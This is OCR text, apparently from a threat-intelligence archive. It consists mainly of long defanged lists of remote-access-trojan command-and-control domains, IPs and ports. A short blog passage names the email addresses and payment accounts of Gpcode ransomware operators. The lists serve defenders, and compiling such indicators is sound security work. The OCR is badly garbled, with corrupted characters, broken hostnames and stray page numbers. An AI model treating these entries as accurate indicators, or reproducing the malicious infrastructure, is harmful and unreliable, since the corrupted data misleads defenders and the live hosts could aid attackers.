hxxp://zero228[.]ddns[.]net/ 
hxxp://zoheirdroidjack[.]zapto[.]Jorg/ 
hxxp://zokor-zokor[.]ddns[.]net/ 
hxxp://zongkahani[.]no-ip[. ]biz/ 
hxxp://zouhr9[. ]hopto[.Jorg/ 
hxxp://zxczxczxc[.]ddns[.]net/ 


Related RATs (Remote Access Tools) C &C server IPs known to have been involved in related 
Campaigns: 


farzan[.]Jddns[.]net:1337 
harounel12[.]myddns[.]me:1177 
jirawat0O1[.]ddns[.]net:3333 
oday1995[.]zapto[.]org:1337 
1m4962f897[.]iok[.]la:1337 
yousefehab11[.]ddns[.]net:8080 
showj[.]f3322[.]net:5555 
moktarpicaasrinabil[.]zapto[.Jorg:1337 
gaabar[.]hopto[.Jorg:1337 
mypy23[.]ddns[.]net:1337 
gooogleplay[.]ddns[.]net:1337 
mstfa10[.]ddns[.]net:1337 
noxrr[.]ddns[.]net:4433 
7daysky[.]in[.]3322[.Jorg:1345 
astro3[.]hopto[.]org:1337 
sasi546454[.]hopto[.]Jorg:3333 

18987 


kjgjgkhffh[.]sytes[.]net:1337 
misterx94[.]Jddns[.]net:1177 
ovirus[.]ddns[.]net:1337 
197[.]35[.]134[.]69:9999 
61[.]153[.]104[.]113:1234 
brasilteamop[.]ddns[.]net:1604 
chacalOO[.]hopto[.]Jorg:1337 
duke5010[.]duckdns[.]org:4444 
144[.]48[.]242[.]221:1573 
ahmdiand-wj3[.]ddns[.]net:1178 
heikechenmo[.]3322[.Jorg:2015 
ron1372[.]ddns[.]net:3333 
eslam87[.]hopto[.]org:3333 
vego[.]ddns[.]net:1337 
droidjack2137[.]hopto[.]Jorg:1337 
free1[.]neiwangtong[.]com:1235 
keskes02122002[.]ddns[.]net:3333 
aminamadani16[.]hopto[.Jorg:1177 
fadisesubaih[.]ddns[.]net:5711 
taherhacker[.]hopto[.]org:1337 
201[.]157[.]144[.]53:1337 
hacker2[.]hopto[.]org:1337 
dalibob12[.]ddns[.]net:5522 
husshacka[. ]hopto[.]org:1337 
snaider[.]hopto[.Jorg:1177 
hedr78[.]ddns[.]net:4411 
dendroid[.]hopto[.Jorg:1337 
droidhost[. ]zapto[.]Jorg:1337 
ahomdalhomd42[.]hopto[.]org:1177 
axxz2017[.]ddns[.]net:4444 
droid[.]freedynamicdns[.]org:8524 
spiel007[.]ddns[.]org:1604 
66[.]70[.]198[.]243:1031 
hakosiken[.]duckdns[.]org:7777 
medx321[.]ddns[.]net:1337 

18988 


askinder[.]hopto[.Jorg:1177 
greatkeyboard[.]hopto[.]org:3333 
testkps[.]ddns[.]net:3210 
hackhamer[. ]zapto[.]org:1337 
zouhr9[.]hopto[.]org:1337 
inteljet[.]Jddns[.]net:1334 
mazenttr2[.]hopto[.Jorg:1337 
mohfort[.]ddns[.]net:1337 
radouan123[.]hopto[.]Jorg:1337 
a302a85al[.]ngrok[.]io: 10086 
minou555[.]hopto[.Jorg:1177 
39[.]43[.]231[.]228:4444 
nododg[.]ddns[.]net:1337 
s[.]leas[.Jim:1337 
115[.]159[.]125[.]47:8085 
41[.]226[.]168[.]63:1337 
karenchik19[.]hopto[.]org:1337 
malakatef09[.]ddns[.]net:1337 
alaauy[.]ddns[.]net:1337 
115[.]159[.]125[.]47:8086 
hakunamatata007[.]ddns[.]net:8000 
marocmaroc[.]hopto[.]org:3333 
197[.]2[.]81[.]35:1337 
5107b712[.]all123[.]Jnet:1234 
hajeeeee[.]hopto[.Jorg:1337 
198[.]144[.]106[.]135:6687 
locolocoloco[.]Jddns[.]net:420 
lputyr[.]myq-see[.]com:1337 
ycarohacker@ddns[.]net:2016 
zaheerkhan786[.]ddns[.]net:1137 
zaheerkhan786[.]ddns[.]net:1337 
zaheerkhan786[. ]ddns[.]net:1604 
droidjackiam[.]ddnsking[.]com:1337 
freepalestine[.]ddns[.]net:1337 
lahyarhmo[.]hopto[.Jorg:1337 
18989 


salah067[.]hopto[.Jorg:1177 
xtiger007[.]ddns[.]net:1900 
cyberbit[.]ddns[.]net:1337 
120[.]25[.]150[.]91:7422 
cerdofile[.Jddns[.]net:1337 
jas7ser[.]hopto[.Jorg:1337 
intelresol[.]ddns[.]net:80 
youseffathii[.]ddns[.]net:1337 
213[.]136[.]83[.]173:1337 
5[.]222[.]70[.]95:8080 
gmailss11[.]hopto[.Jorg:1720 
grandeamore[.]ddns[.]net:1337 
local1232[.]ddns[.]net:2323 
fatiha29[.]ddns[.]net:1117 
rahimtrx[.]hopto[.]org:3399 
151[.]247[.]143[.]125:1024 
sharawy74[.]hopto[.]org:1337 
13[.]65[.]194[.]5:1905 
haxorjib[.]no-ip[.]org:1337 
105[.]101[.]151[.]77:8080 
mami5255[.]duckdns[.]Jorg:1905 
portmeim[.]ddns[.]net:4444 
hakedpcOO0O[.]myftp[.]biz:1337 
lizdlezozifpo[.Jddns[.]net:1337 
achrafzouina[.]zapto[.]org:1337 
hacksyria2[.]myftp[.]biz:1337 
nirajpawar1997[.]ddns[.]net:1103 
moji1936[.]ddns[.]net:4444 
khaleelO[.]zapto[.]org:1900 
makarand[.]no-ip[.Jorg:5343 
hala222[.]hopto[.Jorg:1337 
hamo55[.]hopto[.Jorg:1337 
hasha[. ]hopto[.]org:1337 
188[.]215[.]131[.]47:8899 
ahmedmidoegypt[.]hopto[.Jorg:1337 
18990 


lolman[.]Jddns[.]net:1177 
mrreda98[.]ddns[.]net:1337 
117[.]32[.]216[.]117:6670 
anonO008[.]ddns[.]net:3333 
yassinescaleo[.]ddns[.]net:1177 
123[.]207[.]232[.]79:7777 
139[.]199[.]187[.]28:8 
osamarizk[.Jddns[.Jnet:5552 
abderrahmane16[. ]hopto[.Jorg:1337 
uzzal619[.]viewdns[.]net:8080 
58[.]213[.]154[.]197:8112 
wwwl[.]177muf[.]cn:1688 
abdou16[.]hopto[.Jorg:1177 
danielrats[.]ddns[.]net:1604 
nemesis2017[.]zapto[.]org:1604 
222[.]79[.]227[.]93:3333 
mohmdnor[.]ddns[.]net:1177 
vwelxv[.]ddns[.]net:1337 
drhack[.]hopto[.Jorg:1337 
wwwl[.]darkteam[.]xyz:22005 
xmppegy[.]com:3711 
droid[.]Jserverhttp[.]com:1337 
krlol[.Jddns[.]net:1337 
dellearm[.]ddns[.]net:1177 
hell2066[.]zapto[.Jorg:1337 
slayslay[.]duckdns[.]org:1300 
smk22[.]jkt[.]net:1337 
115[.]28[.]173[.]37:1377 
aminbatna31[.]ddns[.]net:5557 
ghanim2017[.]ddns[.]net:8888 
hossam3030[.]ddns[.]net:1234 
lordxxx[.]myq-see[.]com:1337 
masafat[.]ddns[.]net:4444 
amrsamy222[.]ddns[.]net:1998 
batterysaver[.]3utilities[.]com:1337 


18991 


erikatersptra[.]ddns[.]net:1334 
likerrdd[.]Jmyftp[.]biz:1337 
mohmad[.]myftp[.]biz:3389 
rameezmaster[.]ddns[.]net:1337 
2715729[.]vicp[.]net:5130 
rmk133[.]hopto[.]org:1080 
tnaxin[.]msns[.]cn:1337 
madblackO[.]sytes[.]net:1337 
rameezmaster[.]ddns[.]net:1177 
havij[.]Jddns[.]net:1723 
paaradowx[.]hopto[.]org:1337 
hamza19991[.]hopto[.]org:1337 
profmilf[.]zapto[.]org:1337 
wasxmrtdub[.]ddns[.]net:1337 
hac123k[.]hopto[.]org:4444 
109[.]225[.]178[.]41:1337 
**4you[.]ddns[.]net:80 
barbari[.]ddns[.]net:3333 
34[.]208[.]211[.]52:4444 
camper92[.]ddns[.]net:1339 
targiO1[.]hopto[.Jorg:1337 
5[.]222[.]66[.]57:1337 
hosteng123[.]hopto[.Jorg:1337 
migo2018[.]zapto[.Jorg:5552 
192[.]137[.]O[.]15:1234 
androidfdll[.]ddns[.]net:1337 
ferzo1881[.]duckdns[.]org:1819 
hack155[.]vicp[.]net:1337 
jalal123[.]hopto[.Jorg:1337 
krem111[.]ddns[.]net:8080 
wassam100[.]ddns[.]net:1337 
5[.1234[.]240[.]27:113 
danialdelta[.]ddns[.]net:1616 
rzra51126[.]ddns[.]net:8080 
banis[.]hopto[.Jorg:1337 

18992 


. http: //ddanchev. blogspot .com/2008/07/fake-porn-sites-serving-malware-part .htm 


15. http: //ddanchev. blogspot .com/2008/06/fake-porn-sites-serving-malware .htm 
. http: //ddanchev.blogspot .com/2008/09/estdomains-and- intercage-vs-cybercrime.htm 


. http: //ddanchev.blogspot .com/2008/08/fake-security-software-domains-serving.htm 


18. 
. http: //ddanchev. blogspot. com/2008/05/got- your-xpshield-up-and-running. htm 
20 
2. 
Fo amma ol ccapee cate) 0 taser cats es aessegco Tee el 


. http: //ddanchev. blogspot .com/2008/02/geolocating-malicious-isps.htm 


. http: //ddanchev. blogspot . com/2008/06/malicious-isps-you-rarely-see-in-any.html 


4.9.17 Identifying the Gpcode Ransomware Author (2008-09-30 23:35) 


GP-CRYPT Decryptor @s x| 
GP-CRYPT Decryptor 


i ) Decrypting complete. 


Files decrypted : 


Total encrypted size ; 
Files : 


Current ; 


Interesting article, but it implies that [1]there has been a shortage of quality OSINT regarding 
the campaigners behind the recent [2]Gpcode targeted cryptoviral extortion attacks : 


"The individual is believed to be a Russian national, and has been in contact with at 
least one anti-malware company, Kaspersky Lab, in an attempt to sell a tool that could be 
used to decrypt victims’ files. Kaspersky Lab set about locating the man by resolving the 
proxied IP addresses used to communicate with the world to their real addresses. The proxied 
addresses turned out to be zombie PCs in countries such as the US, which pointed to the fact 
that GPcode’s author had almost certainly used compromised PCs from a single botnet to get 
Gpcode on to victim’s machines." 


In reality, there hasn’t been a shortage of timely OSINT aiming to to identify the authors 
- "[3]Who’s behind the GPcode ransomware?" : 


1902 


mrhacker12@hoptol[.]org:1337 
priyakumari[.]ddns[.]net:1337 
mahdi1379[.]lddns[.]net:1337 
namandroidk63[.]zapto[.Jorg:1337 
141[.]255[.]159[.]49:1337 
ali7070[.]ddns[.]net:1177 
reich666[.]ddns[.]net:1991 
anawebs[.]ddns[.]net:1234 
hazem123[.]no-ip[.]biz:1337 
imad2001bo[.]hopto[.Jorg:1177 
haker10[.]ddns[.]net:1177 
marcsil[.]ddns[.]net:1000 
moslim[.]ddns[.]net:1177 
updatexxx[.]hopto[.Jorg:455 
za3blawy[.]ddns[.]net:9999 
medoahmed3I[. ]ddns[. ]net:1337 
reich777[.]ddns[.]net:1991 
usa[.]myftp[.]biz:3333 


123456789123456789[. ]myftpl.]biz:5552 


hackinroll[.Jddns[.]net:1337 
mhoammedtty[.]hopto[.]org:1441 
myillusion02[.]hopto[.Jorg:1177 
197[.]48[.]183[.]72:81 
ayadd99[.]ddns[.]net:1982 
createmeon|[.]zapto[.Jorg:81 
matin[.]ddns[.]net:13700 
projectp[.]ddns[.]net:1337 
sniperviruse3[.]hopto[.Jorg:1337 
phantom94[.]ddns[.]net:1337 
napaixonado[.]ddns[.]net:1337 
parrotO1[.]hopto[.Jorg:1337 
105[.]199[.]18[.]240:1111 
ehsanmaali3[.]ddns[.]net:9988 
zoheirdroidjack[.]zapto[.]org:3333 
new777[.]ddns[.]net:1337 


18993 


176[.]42[.]111[.]248:1628 
37[.]114[.]212[.]119:1112 
halo12[.]duckdns[.]org:1337 
secureline2244[.]ddns[.]net:1337 
14[.]222[.]182[.]50:5688 
46[.]166[.]134[.]149:1337 
driodrac[.]Jddns[.]net:1337 
103[.]21[.]117[.]143:7234 
shosh[.]ddns[.]net:1234 
xingyuekeji[.]f3322[.]net:1337 
facebook2ww290[.]ddns[.]net:1234 
Slavikkalinovskiy[.]ddns[.]net:81 
ehsanmaalil.]ddns[.]net:9988 
mee2008[.]zapto[.]Jorg:4321 
kinggg[.]ddns[.]net:1177 
saighinissou[.]ddns[.]net:1177 
sara19918[.]ddns[.]net:1177 
80[.]59[.]208[.]237:5999 
thegod2[.]ddns[.]net:8282 
laze22[.]hopto[.Jorg:1337 
marknetz[.]hopto[.Jorg:139 
sramic[.]ddns[.]net:7800 
hamzaelcb[. ]ddns[. ]net:1337 
kalinus[.]ddns[.]net:1337 
52[.]193[.]97[.]24:1337 
ariaaalikazm[.]ddns[.]net:1997 
deep1234[.]ddns[.]net:1177 
petermohsenvi2[.]hopto[.]org:20209 
sazan765[.]ddns[.]net:1337 
1488[.]sytes[.]net:1334 
jackdroid[.]systes[.]net:1177 
asdbh11[.]ddns[.]net:1177 
dddeee[.]ddns[.]net:1337 
yamsohe[.]ddns[.]net:30639 
ad15[.]hopto[.Jorg:1177 

18994 


hero400[.]ddns[.]net:1177 
hoseenoori2277kh[.]ddns[.]net:1337 
brousse16[.]ddns[.]net:1337 
hero400[.]ddns[.]net:1337 
mohsanali79355[.]ddns[.]net:1337 
oko[.]gotdns[.]ch:1337 
mghorbani78[.]ddns[.]net:27016 
netflix-ip[.]hopto[.]org:1357 
androduck[.]duckdns[.]org:1604 
hgqn[.]ddns[.]net:1334 
kalljo[.Jdvrdns[.Jorg:1111 
memeaimen10[.]hopto[.]org:3333 
ninjabird29[.]myvnc[.]com:4444 
nowgirlas[.]ddns[.]net:1337 


mohammed93mahdil[.]ddns[.]net:1337 


tatacall[.]servebeer[.]com:1337 
droidcraftismelmao[.]ddns[.]net:1220 
droidrat[.]hopto[.]org:13358 
muxamilu[.]hopto[.Jorg:1337 
sorry[.]duckdns[.]org:6661 
ssjf[.]myftp[.]biz:1177 
213[.]244[.]123[.]94:1178 
aagaro[.]ddns[.]net:2221 
hosthack25[.]ddns[.]net:5900 
mayyahaf[.]no-ip[.]info:1250 
mmdjj212[.]myftp[.]biz:4444 
213[.]183[.]58[.]40:4444 
vetalamator1[.]ddns[.]net:1337 
46[.]4[.]255[.]98:1177 
droidniggal[.]zapto[.Jorg:2222 
engnngns[.]duckdns[.]org:1337 
aliboxboxbox[.]hopto[.]org:1337 
bopress[.]ddns[.]net:1337 
loveubaby[. ]3utilities[.]Jcom:80 
XNxx123[.]publicvm[.]com:1337 


18995 


droidjackkk[.]sytes[.]net:1337 
mikaniki[.]Jddns[.]net:1221 
aziza[.]sytes[.]net:1177 
makarand[.]no-ip[.]Jorg:1234 
testxy[.]ddns[.]net:2020 
johnharim004[.]ddns[.]net:8080 
theblack16[.]ddns[.]net:2000 
amsdj[.]hopto[.]org:1337 
gemini85[.]hopto[.]org:1337 
amrozamrozamroz[.]hopto[.Jorg:1337 
seyf2017[.]linkpc[.]net:1337 
jun[.]Jdynu[.]com:1604 
refsa[.]duckdns[.]Jorg:8081 
138[.]122[.]118[.]154:1515 
samuseucu[. ]ddns[. ]net:1602 
webhack2017[.]ddns[.]net:1337 
bl4ckhatjoker[.]ddns[.]net:1337 
90[.]16[.]206[.]207:5150 
behnamhack[.]ddns[.]net:3389 
sonkar412[.]duckdns[.]org:1337 
ipv445[.]hopto[.Jorg:1025 
mphpl[.]hopto[.]org:19 
tonyjony[.]ddns[.]net:1177 
cyberandro[.]duckdns[.]org:51 
hhhhhfhf[.]ddns[.]net:8080 
mogahed[.]ddns[.]net:1177 
103[.]40[.]163[.]55:1337 
hobil[.]3utilities[.]Jcom:1337 
sonkar412[.]duckdns[.]org:1604 
6gh[.]noip[.]me:1604 
azerboys[.]hopto[.]org:1337 
nohacker[.]ddns[.]net:1177 
mobdro[.]hopto[.Jorg:1337 
anishmishra66[.]ddns[.]net:81 
myhost123[.]myftp[.]biz:5454 
18996 


didi03[.]duckdns[.]org:1337 
mehtab123[.]ddns[.]net:1604 
wombocombo[.]mooo[.]com:5555 
abcccabccab[.]ddns[.]net:1337 
duckem[.]duckdns[.]org:1337 
myhost123[.]myftp[.]biz:7888 
rmx2121[.]ddns[.]net:1337 
anondz97[.]ddns[.]net:1337 
hohoangpmy[.]ddns[.]net:1177 
myhost123[.]myftp[.]biz:5545 
141[.]255[.]150[.]159:8080 
adlin[.]duckdns[.]Jorg:1337 
kaskw[.]myftp[.]biz:3333 
orihacker[.]ddns[.]net:1337 
103[.]44[.]145[.]245:1337 
lamorash[.]ddns[.]net:80 
memexmamal.]ddns[.]net:1313 
skinchanger|[. ]hopto[.]org:1337 
121[.]147[.]18[.]158:1734 
141[.]255[.]148[.]161:1337 
droidjaack[. ]zapto[.]org:1337 
droidjock[.]myftp[.]biz:1337 
josewaldo[.]ddns[.]net:1604 
186[.]84[.]216[.]126:8080 
city55[.]hopto[.Jorg:1177 
hacker421[.]hopto[.Jorg:1337 
alb2c3[.]Jhopto[.Jorg:2222 
amirhosein0074[.]ddns[.]net:1616 
hacksd20[. ]ddns[. ]net:1337 
iran0513[.]ddns[.]net:1337 
nadineemma|[.]servegame[.]com:1337 
abs3nt[.]ddns[.]net:3460 
kaizenOO[.]ddns[.]net:1534 
salemaziz[.]hopto[.]org:1998 
skylex123[.]hopto[.]org:3000 
18997 


usmh[.]myq-see[.]com:1337 
explosif[.]zapto[.]org:2002 
fateh2017[.]ddns[.]net:1337 
kheridla[.]hopto[.Jorg:1177 
boubou271[.]ddns[.]net:7777 
gta5hacking12[.]duckdns[.]org:8922 
kuraist[.]zapto[.Jorg:7777 
726627[.]duckdns[.]org:81 
test29[.]ddns[.]net:1337 
testapkk[.]hopto[.Jorg:2223 
yurimacedol1[.]ddns[.]net:81 
auc[.]dlinkddns[.]com:1337 
kaskw[.]myftp[.]biz:1177 
kaskw[.]zapto[.]org:1234 
kaskw[.]zapto[.]org:9999 
mar020one[.]hopto[. ]org:3333 
ditelegram[.]ddns[.]net:1616 
mohamed4dz[.]ddns[.]net:1337 
udown[.]ddns[.]net:1177 
abosaoys881[. ]duia[.]us:1337 
alaajb[.]zapto[.]org:3333 
35[.]161[.]238[.]10:1177 
asasasaS22[.]ddns[. ]net:1337 
mstar[.]ddns[.]net:1337 
daniele3814[.]ddns[.]net:1177 
156[.]206[.]211[.]12:1337 
adesja1337[.]no-ip[.]biz:1337 
hegazy5753[.]ddns[. ]net:3333 
kka163[.]ddns[.]net:3333 
kusleratnt[.]duckdns[.Jorg:122 
waSawalid[.]hopto[.]org:6655 
219[.]235[.]O[.]93:1337 
37[.]115[.]170[.]240:1604 
mht3[.]ddns[.]net:443 
5[.]237[.]98[.]77:1337 

18998 


ahmed90011912[.]ddns[.]net:1337 


galau[.]ddns[.]net:1177 
jassair[.]hopto[.Jorg:1337 


superlegitratvirus[.]ddns[.]net:3389 


zaboza2020[.]ddns[.]net:1337 
androidtestO[.]ddns[.]net:1604 
ayham11[.]hopto[.]org:8080 
heemoana[. ]hopto[.]org:1337 
windows12345[.]ddns[.]net:5558 
hossar[. ]ddns[.]net:1337 
houssmes[.]zapto[.]org:1337 
masterat[.]myftp[.]org:1337 
zennone[.]ddns[.]net:1509 
fsocfsoc[.]ddns[.]net:1337 
msn79[.]ddns[.]net:8080 
oussamadj1997[.]ddns[.]net:1337 
makarand[.]no-ip[.Jorg:2000 
mido28[.]hopto[.]org:9999 
rinalditeam[.]ddns[.]net:1122 
77[.]171[.]37[.]46:1694 
bwaleez[.]hopto[.Jorg:1337 
droidmosa[.]ddns[.]net:1337 


prohacker[. ]freedynamicdns[.]org:1337 


aminecity[.]ddns[.]net:4444 
essalhi2047[.]hopto[.Jorg:1337 
me512[.]zapto[.Jorg:1998 
103[.]216[.]60[.]70:13755 
hassan100[. ]ddns[. ]net:1337 
kakashil[.]ddns[.]net:1337 
salarkalat[.]ddns[.]net:8080 
userframer[.]sytes[.]net:1144 
chabar[.]ddns[.]net:1337 
juliocoelhodesa[.]hopto[.]org:1604 
standby1537[.]duckdns[.]org:1650 
hoho39[.]ddnc[.]net:1337 


18999 


woaisue[.]3322[.]org:2800 
equisde[.]ddns[.]net:1337 
42[.]200[.]36[.]237:18888 
45[.]126[.]124[.]155:1337 
abinova[.]ddns[.]net:9999 
bl4ckhOt[.]ddns[.]net:8569 
damndamn[.]ddns[.]net:1337 
victim[.]no-ip[.]org:1337 
yangweb[.]f3322[.]net:9666 
190[.]240[.]24[.]2:1337 
abarouter[.]ddns[.]net:1337 
umar14344[.]ddns[.]net:1337 
andriod91[.]ddns[.]net:1337 
djack1[.]zapto[.Jorg:1337 
27[.]198[.]135[.]116:1337 
abdo099[. Jddns[. ]net:2222 
hooman8219[.]servecounterstrike[.]com:1337 
jackdroid1337[.]ddns[.]net:1337 
majed111111[.]myq-see[.]Jcom:1998 
premium007[.]zapto[.]org:1337 
192[.]248[.]32[.]193:1337 
ahmed12345[.]hoptp[.Jorg:1177 
88[.]228[.]83[.]160:1881 
dzhacker16[.]ddns[.]net:5552 
tomyyk[.]ddns[.]net:1337 
test[.]pagez[.]kr:8174 
beijg[.]3322[.]org:1337 
osmsalem[.]ddns[.]net:5005 
178[.]74[.]111[.]106:1024 
clayhost[.]hopto[.Jorg:7070 
myfreerat[.]ddns[.]net:1337 
sesizkal32[.]no-ip[.]biz:81 
bahar2017[.]no-ip[.Jorg:1337 
huhuhuya[.]ddns[.]net:1337 
kmessil.]myddns[.]me:1337 
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fukeyou12[.]myftp[.]biz:1337 
85[.]107[.]115[.]16:2011 
updater[.]myftp[.]org:1337 
detlef-gmbh[.]tk:1771 
moosio[.]no-ip[.]biz:81 
good[.]myddns[.]me:1337 
sweetman2020[.]no-ip[.]biz:1337 
jafarman[.Jddns[.]net:81 
jojomo[.]ddns[.]net:1177 
211[.]162[.]52[.]205:6670 
79649759[.]ddns[.]net:1337 
androidbra[.]duckdns[.]org:1903 
spynote-web[.]dynu[.]com:1337 
haker-2119[.]ddns[.]net:1024 
tahal00iq[.]hopto[.]org:1337 
109[.]236[.]94[.]121:1337 
46[.]150[.]252[.]235:1334 
46[.]150[.]252[.]235:1337 
firsthost[.]ddns[.]net:1337 
gogaggg[.]ddns[.]net:16713 
dragonhkr1[.]myftp[.]biz:1177 
mrblacklife[.]ddns[.]net:8080 
2[.]191[.]186[.]145:1337 
dodotototata[.]publicvm[.]com:1337 
ghanou1603[.]no-ip[.]info:9999 
kaedalsh[.]ddns[.]net:1337 
alarr2012ab[.]myftp[.]biz:1337 
alzintani[.]ddns[.]net:1337 
hananox[.]ddns[.]net:2044 
111[.]72[.]167[.]127:8088 
192[.]92[.]42[.]25:443 
daroedkak[.]no-ip[.]biz:1332 
kasper[.]ddns[.]net:4444 
nulldoesnotexist[.]duckdns[.]org:79 
saraia[.]ddns[. ]net:1337 
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spofy[.]Jddns[.]net:7711 
usernamegoprol1[.]ddns[.]net:1337 
droidjackisgodly[.]ddns[.]net:1337 
hamidos1342[.]ddns[.]net:1337 
abduls0821[.]myddns[.]me:1337 
geocheats2[.Jeu:1337 
test145[.]ddns[.]net:1335 
abduls0821[.]myddns[.]me:5523 
securitytestt[.]ddns[.]net:4343 
mixtape2016[.]ddns[.]net:1337 
vigo[.]hopto[.Jorg:1177 
allforfree[.]game-host[.]org:1337 
aminrahimzadeh[.]no-ip[.Jorg:1134 
googlead[.]publicvm[.]com:1337 
201[.]156[.]140[.]218:1337 
androjak[.]myftp[.Jorg:1337 
zaqatala[.]dynu[.]com:7744 
ufologlyly[.]Jddns[.]net:1337 
makarand[.]no-ip[.]org:1388 
80[.]82[.]65[.]85:8085 
rds11[.]ddns[.]net:1337 
servr[.]hopto[.Jorg:1337 
185[.]82[.]220[.]152:1628 
comsurogate[.]noip[.]me:1334 
vajausing[.]dynu[.]Jcom:2095 
updatesystem[.]dynu[.]com:1067 
wtfwtf[.]Jduckdns[.Jorg:1314 
wtfwtf[.]duckdns[.Jorg:1604 
goshasb[.]ddns[.]net:8899 
royalhacker[.]zapto[.Jorg:1177 
habib556[.]ddns[.]net:1337 
37[.]254[.]193[.]172:1337 
159asd[.]duckdns[.]org:1338 
ammaar938[.]ddns[.]net:1723 
105[.]108[.]35[.]56:1337 
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"So, the ultimate question - who’s behind the GPcode ransomware?_ It’s Russian teens 
with pimples, using E-gold and Liberty Reserve accounts, running three different GPcode 
campaigns, two of which request either $100 or $200 for the decryptor, and communicating 
from Chinese IPs. Here are all the details regarding the emails they use, the email responses 
they sent back, the currency accounts, as well their most recent IPs used in the communication 
(58.38.8.211; 221.201.2.227) : 


Emails used by the GPcode authors where the infected victims are supposed 
to contact them : 

content715@yahoo .com 

saveinfo89@yahoo .com 

cipher4000@yahoo .com 

decrypt482@yahoo .com 


Virtual currency accounts used by the malware authors : 
Liberty Reserve - account U6890784 

E-Gold - account - 5431725 

E-Gold - account - 5437838" 


The bottom line - out of the four unique emails used by the GPcode campaigners, only 


two were actively corresponding with the victims, each of them requesting a different amount 
of money, but both, taking advantage of U.S based web services to accomplish their attack. 


1. http://www.techworld.com/security/news/index.cfm?newsid=10504 
2. http://it.slashdot .org/article.p1l?sid=08/09/30/1446211 
3. http://blogs .zdnet .com/security/?p=1259 
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comsurogate[. ]noip[.]me:5552 
gorr[.]hopto[.Jorg:1337 
testandro[.]ddns[.]net:9999 
mostafaafrotoO[.]ddns[.]net:2278 
http://opt91[.]ddns[.]net:8181 
luxuriaecu[.]ddns[.]net:1337 
houaribey4[.]no-ip[.Jorg:1177 
youssef-1234[.]hopto[.Jorg:1337 
andrew999[.]Jipnodns[.]ru:1337 
11993[.]Jddns[.]net:1177 
181[.]143[.]118[.]164:9999 
euquerotchu[.]ddns[.]net:8080 
droidjack2333[.]ddns[.]net:1337 
crisprueba[.]ddns[.]net:1337 
oussamal1997[.]ddns[.]net:1177 
smiix2012[.]ddns[.]net:3333 
hananox[.]ddns[.]net:5452 
jomo[.]zapto[.]org:1338 
hacked2001[.]hopto[.]org:1337 
mrkriper3331[.]zapto[.Jorg:1234 
ali2627[.]ddns[.]net:1177 
azerty[.]hopto[.Jorg:1177 
securitytests[.]ddns[.]net:1604 


weedforlifehacker[.]ddns[.]net:1337 


kkarox90[.]no-ip[.Jorg:1337 
mohamedamine[.]ddns[.]net:3333 
xalnewold[.]hopto[.]org:1337 
msficecream[.]ddns[.]net:5391 
socialplus[.]ddns[.]net:2222 
takpar67[.]no-ip[.]biz:5514 
79[.]153[.]52[.]235:1337 
droid[.]servehttp[.]com:1337 
fifil47fifi[.]no-ip[.]biz:1337 
9949291099[.]hopto[.]org:1337 
majod98m[. ]ddns[.]net:1998 
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remoteip999[.]ddns[.]net:2255 
androrat22[.]ddns[.]net:9999 
awir-fb[.]sytes[.]net:2025 
93[.]169[.]247[.]218:9999 
ksbozo[.]ddns[.]net:1156 
androidsafe[. ]ddns[.]net:7575 
photofix[.]hopto[.Jorg:1122 
storing[.]hopto[.Jorg:1177 
storing[.]hopto[.Jorg:1337 
amiraliam[.]ddns[.]net:1337 
matrix-teste[.]Jddns[.]net:1337 
webi7[.]ddns[.]info:1000 
1fon1[.]ddns[.]net:1337 
android1385[.]ddns[.]net:9999 
datadownloader[.]Jddns[. ]net:9987 
droidspy[.]zapto[.]org:1337 
abdobacha05[.]ddns[.]net:1998 
mrclone97[.]ddns[.]net:1883 
96750513[.]ddns[.]net:5552 
appsystem[.]ddns[.]net:1337 
houaribey4[.]ddns[.]net:1177 
injectman[.]ddns[.]net:5555 
kOkOWawa[. ]hopto[.]org:1337 
37[.]16[.]139[.]86:1337 
5[.]135[.]127[.]183:1337 
anito[.]ddns[.]net:1334 
anito[.]ddns[.]net:1337 
rarwindow[.]no-ip[.]biz:8877 
abbaass3132[.]hopto[.Jorg:9999 
abbaass3132[.]hopto[.Jorg:999 
heilbronn[.]duckdns[.]Jorg:1907 
91[.]109[.]22[.]5:1337 
abbaass3132[.]hopto[.Jorg:1337 
andrO1d[.]zapto[.]org:1337 
sadaq[.]ddns[.]net:1337 
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great-support[.]com:1337 
makarand[.]no-ip[.Jorg:5421 
boinserver12[.]no-ip[.]Jinfo:1337 
37[.]152[.]166[.]4:4000 
hahalol[.]ddns[.]net:1604 
httpdssh[.]ddns[.]net:1337 
androidupdate[.]ddns[.]net:1659 
windows /trojan[.]ddns[.]net:501 
188[.]3[.]13[.]98:1300 
r00t[.]myftp[.]biz:5433 
thedroidjack[.]ddns[.]net:4444 
2[.]236[.]40[.]82:9999 


ducmanhhoangtran[.]ddns[.]net:2345 


blackghostorg[.]ddns[.]net:1337 
mahdibaba123[.]ddns[.]net:1337 
5701c196[.]123nat[.]Jcom:2015 
ampala[.]ddns[.]net:1337 
apkhamza[.]ddns[.]net:1025 
arondograul[.]ddns[.]net:1177 
gusuil[.]ddns[.]net:1234 
rpshowpick[.]ddns[.]net:1337 
warll0ck[.]ddns[.]net:1604 
droidjack121[.]ddns[.]net:1337 
hadsurvey[.]ddns[.]net:1337 
w0rm32[.]ddns[.]net:1337 
abbaass313[.]hopto[.]Jorg:1337 
rpswirkgkarp[.]p-e[.]kr:1337 
kaliheh[.]no-ip[.]biz:8899 
dro[.]soxx[.Jus:27015 
hahalol[.]no-ip[.]biz:1604 
hmt1985[.]ddns[.]net:1177 
aqwkdol[.]no-ip[.]biz:1337 
badguy[.]myq-see[.]com:1337 
hoho121292[.]ddns[.]net:1337 
droidge[.]ddns[.]net:1337 


19005 


droidjackdns[.]duckdns[.]Jorg:1031 
mohamed11[.]ddns[.]net:9999 
newword[.]serveblog[.]net:1337 
xilto[.]duckdns[.]org:6666 
kevte26[.]zapto[.]org:1337 
taras1928[.]ddns[.]net:1337 
hackertn123[.]no-ip[.]biz:5552 
103[.]38[.]252[.]63:1337 
ahag3ld1[.]ddns[.]net:1337 
welcomeheretomept[.]ddns[.]net:1337 
raliphesus[.]ddns[.]net:1313 
domeer-android[.]ddns[.]net:1234 
95[.]173[.]240[.]117:81 
googleweb[.]ddns[.]net:1337 
anonimousdre180[.]ddns[.]net:1803 
led5526[.]ddns[.]net:3333 
comet[.]myftp[.]org:1920 
zero228[.]ddns[.]net:1199 
server4update[.]serveftp[.]com:2222 
wcvwcv[.]picp[.]net:2016 
blind1234[.]ddns[.]net:3390 
andro123[.]duckdns[.]Jorg:51 
tunisvista[.]3utilities[.]com:1337 
vipmustafa[.]no-ip[.]info:1337 
korelev[.]no-ip[.]org:1337 
